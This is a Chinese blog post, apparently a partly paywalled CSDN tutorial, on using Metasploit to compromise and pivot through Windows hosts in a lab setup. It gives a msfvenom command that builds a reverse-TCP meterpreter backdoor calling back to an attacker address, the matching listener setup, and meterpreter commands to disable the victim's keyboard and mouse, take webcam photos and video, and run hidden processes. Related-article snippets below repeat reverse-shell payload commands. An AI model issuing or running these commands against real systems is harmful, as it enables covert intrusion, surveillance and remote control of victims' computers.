MSF配置代理转发

Metasploit代理转发与多主机上线实战
原创 已于 2023-07-14 08:12:52 修改 · 984 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全 #系统安全

于 2023-07-13 20:15:00 首次发布
本文详细介绍了如何使用Metasploit(MSF)进行代理转发,实现主机1、2、3的上线。内容包括网络架构、MSF上线步骤、命令使用,如uictl、webcam、getsystem等,以及提权、远程桌面和键盘记录。通过代理转发,成功控制主机2和3,涉及路由设置、后门部署及iis测试。

一、网络架构

 二、MSF实现主机1上线

生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.222 lport=1111 -f exe >
/home/share/1111.exe

生成监听器

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1111
run

在被入侵的主机上,执行后门后,此时会发现上线成功

 三、MSF的命令

基本系统命令

background            #将当前会话放置后台,然后可以再运行其他模块进行提权
sessions              #sessions –h 查看帮助
sessions -i <ID值>    #进入会话 -k 杀死会话
getuid                # 查看权限
getpid                # 获取当前进程的pid
sysinfo               # 查看目标机系统信息
ps                    # 查看当前活跃进程 kill <PID值> 杀死进程
idletime              #查看目标机发呆(无操作)时间
reboot / shutdown     #重启/关机
shell                 #进入目标机cmd shell

uictl开关键盘、鼠标

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse                          #禁用鼠标
uictl disable keyboard                       #禁用键盘

webcam摄像头命令

webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频

执行exe文件

execute -f                  #命令在目标主机上执行应用程序
execute -f c:\\111.exe
execute -H -i -f cmd.exe  # 创建新进程cmd.exe,-H不可见,-i交互

migrate进程迁移

getpid              # 获取当前进程的pid
ps                  # 查看当前活跃进程
migrate <pid值>     #将Meterpreter会话移植到指定pid值进程中,
kill <pid值>
最低0.47元/天 解锁文章
诉雪离殇
关注
msf 代理转发
03-11 5612
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理
利用MSF设置代理
Continuejww的博客
11-10 2303
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 1362
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 3643
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网渗透测试 MSF搭建socks代理
m0_63028223的博客
10-14 3040
通过msf设置代理渗透内网不出网主机
CS代理msf代理操作(sock)
m0_74402888的博客
08-05 921
开启了一个socks代理,监听vps本地的1080端口,然后再通过这个端口将流量转给msfmsf又添加了路由,所以能将流量直接带入到内网中。在使用msf探测各网段主机信息时,我们需要先添加通往各网段的路由,这样msf才知道怎么走。我们可以添加自动路由,或者指定路由添加,我们先进入meterpreter的shell。(3)set payload windows/meterpreter/reverse_http // 设置 payload。proxychains4 命令。
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
qq_46258964的博客
07-01 2724
MSF后渗透的一些操作 端口转发 添加路由,横向渗透(跨网段攻击) 利用arp扫描内网主机 Socks代理篇 新版的msf和老版的不一样,代理模块也不一样。 auxiliary/server/socks_proxy 配置proxychains 用代理软件去连接建立好的socks隧道,便可以成功访问内网。 proxychains+nmap扫描主机是否存在漏洞 proxychains使用msf框架...
内网渗透-msf及socks代理转发
baynk的博客
05-29 1万+
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 7185
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
msf端口转发上线
m0_53087192的博客
01-14 862
环境 攻击机:kali ip192.168.50.232 被攻击机:win7 开通转发隧道 注册地址:http://www.ngrok.cc msf木马生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=64.69.43.xx LPORT=10151 -f exe > reverse.exe IP地址为中转服务器ip,端口为中专服务器端口,如下图。 开启转发并设置监听 在网站下载linux客户端,开启转发。 ./sunny clientid
Viper+MSF:靶机代理转发上线学习
一只爱吃橙子的羊
02-12 1857
Viper+MSF:靶机代理转发上线学习
内网代理技术总结
m0_66458291的博客
04-17 1203
我们可以使用msf的auxiliary/server/socks_proxy模块和cs的建立sock连接模块来建立,建立好连接之后我们将其中的ip和端口信息配置代理转发软件中,然后将我们的渗透工具添加到代理工具中就可以实现在我们本机对于内网不出网的主机进行测试
SSH反向代理转发至内网msf
weixin_30835649的博客
08-03 777
前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来。 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:...
msf添加路由及socks5代理
热门推荐
渗透之路,攻防之间皆学问
05-07 1万+
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
端口转发1:通过MSF实现
da_chuan_chuan的博客
01-03 6128
文章目录前言一、生成MSF后门程序并上线二、使用portfwd实现端口转发1、端口转发前测试远程连接和数据库连接是否成功2、进行端口映射总结 前言 在内网渗透过程中,实现端口转发是十分重要的一步。如:我们要进行远程连接,但是它只允许内网主机连接;将内网访问的网站转发出来,实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决,我们可以把内网端口转发到出网的端口上,也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ,以Ubantu为VPS主机。这里为了 方便假设我
内网代理转发
qq_38989921的博客
02-27 341
隔离内网目标:192.168.179.200 该目标无法直接访问,要通过web服务器进行访问 web机器(双网卡):外网IP:192.168.43.100;内网IP:192.168.179.100 首先访问外网IP,上传webshell拿到daemon权限 冰蝎连接: 接下来需要提权,利用Linux的suid提权 能通过suid提权的程序: Nmap Vim find Bash More Less Nano cp 通过find / -perm -u=s -type f 2>/dev/null搜索 发
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 7572
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
kali环境下msf+proxychains构造代理通讯链实现不出网主机通讯
2302_79590880的博客
12-30 1025
linux系统中利用msf配合proxychains构造内网通讯链
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2852
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
msf挂代理反向连接
最新发布
01-04
对于 Java Web 应用程序(WAR 文件),可使用以下命令来生成经过代理转发的 Payload[^3]: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your_IP_Address> LPORT=<Your_Port_to_Connect_On> Proxies=...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值